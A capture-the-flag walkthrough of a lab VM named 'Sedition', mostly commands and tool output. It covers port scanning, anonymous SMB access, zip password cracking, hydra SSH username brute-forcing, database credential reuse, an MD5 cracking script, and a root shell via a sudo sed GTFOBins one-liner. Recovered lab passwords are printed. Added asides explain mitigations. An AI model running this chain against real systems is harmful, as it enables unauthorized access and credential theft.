Sedition


Information gathering

192.168.100.71

Port scanning

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.71
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.71:139
Open 192.168.100.71:445
Open 192.168.100.71:65535
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 15:40 +0800
Initiating ARP Ping Scan at 15:40
Scanning 192.168.100.71 [1 port]
Completed ARP Ping Scan at 15:40, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:40
Completed Parallel DNS resolution of 1 host. at 15:40, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:40
Scanning 192.168.100.71 [3 ports]
Discovered open port 65535/tcp on 192.168.100.71
Discovered open port 139/tcp on 192.168.100.71
Discovered open port 445/tcp on 192.168.100.71
Completed SYN Stealth Scan at 15:40, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.100.71
Host is up, received arp-response (0.00067s latency).
Scanned at 2026-03-26 15:40:51 CST for 0s

PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
65535/tcp open unknown syn-ack ttl 64
MAC Address: 08:00:27:74:0E:D1 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Enumerating SMB on 445

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# smbclient -L 192.168.100.71
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
backup Disk
IPC$ IPC IPC Service (Samba Server)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.100.71 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

There is a share named backup, and it can be listed with an empty password (anonymous / null session).

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# smbclient //192.168.100.71/backup
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 7 01:02:53 2025
.. D 0 Mon Jul 7 02:15:13 2025
secretito.zip N 216 Mon Jul 7 01:02:31 2025

19480400 blocks of size 1024. 16262084 blocks available
smb: \> get secretito.zip
getting file \secretito.zip of size 216 as secretito.zip (42.2 KiloBytes/sec) (average 42.2 KiloBytes/sec)
smb: \>

backup contains a single file, secretito.zip; just get it.


Extracting it asks for a password, so crack it with zip2john and john against rockyou.txt.

┌──(root㉿LAPTOP-O235O5EH)-[~/aaa]
└─# zip2john secretito.zip > secretito
ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0

┌──(root㉿LAPTOP-O235O5EH)-[~/aaa]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt secretito
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sebastian (secretito.zip/password)
1g 0:00:00:00 DONE (2026-03-26 15:48) 50.00g/s 2457Kp/s 2457Kc/s 2457KC/s 123456..trudy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.


john recovers the archive password sebastian. Extracting with it yields the single member file password, which contains elbunkermolagollon123. That password does not work against SMB, and the first rustscan showed one more open port (65535) whose service is still unknown, so enumerate that next.

┌──(root㉿LAPTOP-O235O5EH)-[~/aaa]
└─# rustscan -a 192.168.100.71 -p 65535 -- -sV -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.71:65535
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC" on ip 192.168.100.71
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 15:54 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Initiating ARP Ping Scan at 15:54
Scanning 192.168.100.71 [1 port]
Completed ARP Ping Scan at 15:54, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:54
Completed Parallel DNS resolution of 1 host. at 15:54, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 15:54
Scanning 192.168.100.71 [1 port]
Discovered open port 65535/tcp on 192.168.100.71
Completed SYN Stealth Scan at 15:54, 0.01s elapsed (1 total ports)
Initiating Service scan at 15:54
Scanning 1 service on 192.168.100.71
Completed Service scan at 15:54, 0.02s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.100.71.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Nmap scan report for 192.168.100.71
Host is up, received arp-response (0.00066s latency).
Scanned at 2026-03-26 15:54:17 CST for 1s

PORT STATE SERVICE REASON VERSION
65535/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG/Kzfk09iAKKpRuJrSfx4A4WiSlvP++mk2g5NcP7Bfva4A0l0SZxeDNKXB6iJN1++qyQWE2OUVzLrZ8Gdjkn+M=
| 256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvZ909p40dk+Vi+xYHAfVXI4wI0XGPS/fgHXpFI2mRP
MAC Address: 08:00:27:74:0E:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:54
Completed NSE at 15:54, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.84 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Port 65535 is OpenSSH, so the password most likely belongs to some local user; what is missing is the username.

Brute-forcing the username with hydra (fixed password, username wordlist)

┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -p elbunkermolagollon123 -s 65535 ssh://192.168.100.71
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-26 15:57:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.100.71:65535/
[65535][ssh] host: 192.168.100.71 login: cowboy password: elbunkermolagollon123
[STATUS] 312.00 tries/min, 312 tries in 00:01h, 8295145 to do in 443:08h, 14 active
[STATUS] 290.67 tries/min, 872 tries in 00:03h, 8294586 to do in 475:37h, 13 active

cowboy:elbunkermolagollon123

SSH login

ssh -p 65535 cowboy@192.168.100.71


Privilege escalation

cowboy -> debian


cowboy's .bash_history has not been redirected to /dev/null, so the command history is readable.

The history shows a login to mariadb. cowboy's SSH password is reused for the database, so log in and gather information there.

cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 31
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| bunker |
| information_schema |
+--------------------+
2 rows in set (0,002 sec)

MariaDB [(none)]> use bunker;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [bunker]> show tables;
+------------------+
| Tables_in_bunker |
+------------------+
| users |
+------------------+
1 row in set (0,001 sec)

MariaDB [bunker]> select * from users;
+--------+----------------------------------+
| user | password |
+--------+----------------------------------+
| debian | 7c6a180b36896a0a8c02787eeafb0e4c |
+--------+----------------------------------+
1 row in set (0,001 sec)

MariaDB [bunker]>

This gives a new account, debian, together with its password hash.

The value is a 32-hex-character unsalted MD5 hash, so it cannot be "decrypted", only looked up or cracked; an online lookup such as https://www.cmd5.com/default.aspx finds it immediately (note that this sends the hash to a third party; offline cracking with john or hashcat avoids that).


debian:password1
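The same lookup done offline, as an added example rather than something from the original write-up: the hash from the bunker.users table is compared against the MD5 of each wordlist candidate. The short in-memory wordlist is constructed for the demo; crack_from_file streams a real list such as rockyou.txt instead.

```python
import hashlib
from typing import Iterable, Optional

# Hash taken from the bunker.users table on the page (unsalted MD5, as MariaDB MD5() stores it).
DB_HASH = "7c6a180b36896a0a8c02787eeafb0e4c"

# Constructed mini wordlist standing in for rockyou.txt so the demo runs offline.
SAMPLE_WORDLIST = ["123456", "password", "letmein", "password1", "sebastian"]


def md5_hex(candidate: str) -> str:
    """Unsalted MD5 of the candidate, lowercase hex, matching the database column."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def crack_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose MD5 equals target_hex, else None.

    The target is normalised to lowercase so a hash copied with uppercase
    letters still matches; trailing newlines from file-backed lists are stripped.
    """
    target = target_hex.strip().lower()
    for word in wordlist:
        word = word.rstrip("\r\n")
        if md5_hex(word) == target:
            return word
    return None


def crack_from_file(target_hex: str, path: str) -> Optional[str]:
    """Same as crack_md5, but streams a wordlist file (rockyou.txt is latin-1)."""
    with open(path, "r", encoding="latin-1", errors="ignore") as fh:
        return crack_md5(target_hex, fh)


if __name__ == "__main__":
    hit = crack_md5(DB_HASH, SAMPLE_WORDLIST)
    print(f"{DB_HASH} -> {hit}")
```

Because the hash is unsalted, the same cleartext always produces the same digest, which is exactly why a public lookup table answers it instantly; a salted, slow hash (bcrypt, scrypt, Argon2) would have defeated both the website and this loop.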


debian -> root

sudo -l shows that debian may run /usr/bin/sed as root without a password, which is enough for privilege escalation.

debian@Sedition:/home/cowboy$ sudo -l
Matching Defaults entries for debian on sedition:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User debian may run the following commands on sedition:
(ALL) NOPASSWD: /usr/bin/sed

https://gtfobins.org/gtfobins/sed/

sudo sed -n '1e exec /bin/sh 1>&0' /etc/hosts
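Why that one-liner works, as an added example that is not part of the original write-up: GNU sed's `e command` hands the rest of the script line to /bin/sh and splices the command's output into sed's output stream, so whoever can run sed as root can run anything as root. The `1>&0` in the GTFOBins payload points the shell's stdout at the terminal (fd 0) instead of letting sed swallow it as output text, which is what makes the spawned shell usable. The functions below run without sudo and use a constructed stand-in for /etc/hosts; the sandbox check relies on GNU sed 4.3 or newer, and the sudoers check reads a saved `sudo -l` output rather than the live sudoers file.

```sh
#!/bin/sh
# Constructed input file standing in for /etc/hosts (any readable file works as the 1st line).
TMP_INPUT="$(mktemp)"
printf '127.0.0.1 localhost\n' > "$TMP_INPUT"

# The `e` command on line 1 executes an arbitrary shell command; its output
# lands in sed's output stream.  Replace `echo pwned` with `exec /bin/sh 1>&0`
# and prefix sudo to get the interactive root shell from the write-up.
sed_e_runs_command() {
    sed -n '1e echo pwned' "$TMP_INPUT"
}

# Mitigation: GNU sed 4.3+ has --sandbox, which rejects e/r/w at script
# compile time.  Returns 0 when the command was blocked.
sed_sandbox_blocks() {
    if sed --sandbox -n '1e echo pwned' "$TMP_INPUT" >/dev/null 2>&1; then
        return 1   # command ran: no sandbox, rule is still exploitable
    fi
    return 0
}

# Audit helper: given a file holding `sudo -l` output, exit 0 if sed is
# granted, so the rule can be flagged before an attacker finds it.
sudoers_grants_sed() {
    grep -Eq '(^|[[:space:]/])sed([[:space:],]|$)' "$1"
}

# Stand-alone demo.
sed_e_runs_command
if sed_sandbox_blocks; then echo "sandbox blocks e"; else echo "sandbox unavailable"; fi
```

The fix is not to grant sed via sudo at all; any binary listed on GTFOBins with a shell or file-write primitive turns a NOPASSWD rule into root, and `--sandbox` only helps if the sudoers entry pins that flag.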
